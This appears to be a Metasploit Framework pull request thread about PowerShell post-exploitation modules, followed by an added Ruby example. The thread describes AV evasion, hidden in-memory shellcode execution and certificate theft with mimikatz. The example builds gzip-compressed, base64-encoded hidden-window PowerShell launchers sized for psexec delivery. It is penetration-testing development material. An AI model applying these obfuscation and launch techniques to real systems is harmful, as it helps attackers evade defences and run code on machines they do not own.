Powershell import post #2183
Closed
Conversation
If the regex fails then the entire module would too
Add Rex powershell parser:
- reads PSH, determines functions, variables, blocks
- compresses and cleans up the code it's read
- obfuscates, handles string literals and reserved variable names
- extracts code blocks and functions for reuse
- turns powersploit into a useful sub-component for MSF
Rewire Msf powershell modules:
- Make use of Rex parser
- Handles payload generation, substitutions
- Brings convenience methods - byte array generation and download
Re-add .NET compiler:
- Compiles .NET code (C#/VB.NET) in memory
- Can generate binary output file (dynamic persistence)
- Handles code-signing (steal cert with mimikatz, sign your bin)
- Not detected by AV (still...)
Update payload generation:
- GZip compression and decompression (see Rex module as well)
- msftidy violations for space efficiency - each char counts
Re-submit psexec-psh:
- Makes use of updated Msf and Rex modules
- Runs shellcode in-memory (in a hidden PSH window)
- Completely bypasses all AVs tested for the last year...
@g0tm1lk: no clue, you must've pwned me in your sl33p. :)
Resolve conflicts from old code being pulled into master. Conflicts: lib/msf/core/exploit/powershell.rb modules/exploits/windows/smb/psexec_psh.rb
Remove .NET compiler, post lib and modules.
This is temporary and rather messy. Since the internals for dealing with PSH code have moved to Rex there may be a hiccup or two here. This was my original attempt at basic PSH integration and does not make use of the new libraries and namespaces in this PR. Will introduce the updated modules and libraries in separate PR.
Replace powershell lib which snuck in as psexec_psh. Introduce psexec_psh module which uses the Rex and Msf PSH methods provided in the lib import.
… psh_merge Conflicts: modules/exploits/windows/smb/psexec_psh.rb
Looks good from here, though we may want to address the all caps opt names.
… into powershell_import
This is the core post component broken out from rapid7#2075. Includes new post library leveraging the rex and msf namespace changes in lib. Includes basic modules for script and command execution. These modules can be used as a simple base for complex powershell execution from post modules and RC scripts.
…t-framework into powershell_import
…t-framework into powershell_import_post
This reverts commit 595e538.
Retab/pr/2183
According to GitHub, there are conflicts to solve before we can proceed with this.
This pull request is creating conflicts and can't be landed, please @sempervictus feel free to fix the conflicts and reopen again once ready.
This PR introduces the post modules from #2075. Since they rely on the /lib components in that PR, it is included in this one. We can remove the conflicting components or just commit this PR once we resolve what issues may come.
Notable features of the changes in post are a more in-depth abstraction to simple method calls for executing, cleaning up, and not killing other people's PIDs when running powershell from the "user" side of the framework (writing a post module/rc script). The cleanup process will now check a PID before attempting to kill it, removing the "access denied" errors we were seeing prior when killing a PID which committed suicide anyway.
The modules included are both util modules for executing PSH from a script or a simple command. Point them to a PS1 containing all the relevant pieces of a powersploit attack and they become more than management tools. The post modules and lib illustrate how to consume and prepare PSH code before pushing it to the target system. It is not a long shot from here to write specific modules consuming segments of PSH from different sources, combining, obfuscating, staging, and executing them... with full output.
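As an added example, not code from this PR or from the Metasploit Framework's Rex/Msf libraries, the stand-alone Ruby below shows one way to prepare a PowerShell script before pushing it to a target, along the lines the PR description and the "GZip compression and decompression" / "each char counts" items in the commit message talk about: a minimal clean-up pass, GZip compression wrapped in an inline decompress-and-invoke stub, the UTF-16LE base64 form that powershell.exe -EncodedCommand expects, and a size comparison that picks the shorter launcher. The function names, the sample script and the stub text are this example's own assumptions and do not mirror any Rex or Msf API.

```ruby
require 'zlib'
require 'base64'

# Constructed sample script for this example; not taken from the PR.
SAMPLE_PS1 = <<~'PS1'
  # demo function, the comment line is stripped by clean_psh
  function Get-Marker {
      param([string]$Name = "demo")
      Write-Output ("marker:" + $Name)
  }

  Get-Marker -Name "psh"
PS1

# Minimal clean-up: drop blank lines, whole-line '#' comments and leading
# indentation. Deliberately does not handle <# ... #> block comments or a
# '#' inside a string literal; a real parser (as the PR describes) must.
def clean_psh(script)
  script.each_line
        .map(&:strip)
        .reject { |l| l.empty? || l.start_with?('#') }
        .join("\n")
end

# GZip + base64 so the script can travel inside a single string literal.
def gzip_b64(text)
  Base64.strict_encode64(Zlib.gzip(text))
end

def gunzip_b64(b64)
  Zlib.gunzip(Base64.strict_decode64(b64))
end

# PowerShell stub (assumed wording) that inflates the payload in memory and
# hands it to Invoke-Expression; nothing is written to disk.
def build_gzip_stub(script)
  b64 = gzip_b64(script)
  "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream(" \
  "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('#{b64}'))), " \
  "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
end

# powershell.exe -EncodedCommand takes base64 of the UTF-16LE bytes, not UTF-8.
def encode_command(psh)
  Base64.strict_encode64(psh.encode('UTF-16LE'))
end

def decode_command(b64)
  Base64.strict_decode64(b64).force_encoding('UTF-16LE').encode('UTF-8')
end

# Compare the plain encoded command against the gzip stub and return the
# shorter one. Small scripts lose to the fixed cost of the stub; large or
# repetitive ones (a pasted PowerSploit module) win by a wide margin.
def smallest_launcher(script)
  plain = encode_command(script)
  gz    = encode_command(build_gzip_stub(script))
  gz.length < plain.length ? [:gzip, gz] : [:plain, plain]
end

if $PROGRAM_NAME == __FILE__
  cleaned = clean_psh(SAMPLE_PS1)
  kind, enc = smallest_launcher(cleaned)
  puts "launcher: #{kind}, #{enc.length} chars"
  puts "powershell.exe -NoP -NonI -W Hidden -EncodedCommand #{enc}"
end
```

The length check matters because a launcher pushed through psexec or WMI ends up on a cmd.exe command line, which is capped at 8191 characters; compressing first is what keeps a full PowerSploit module under that limit.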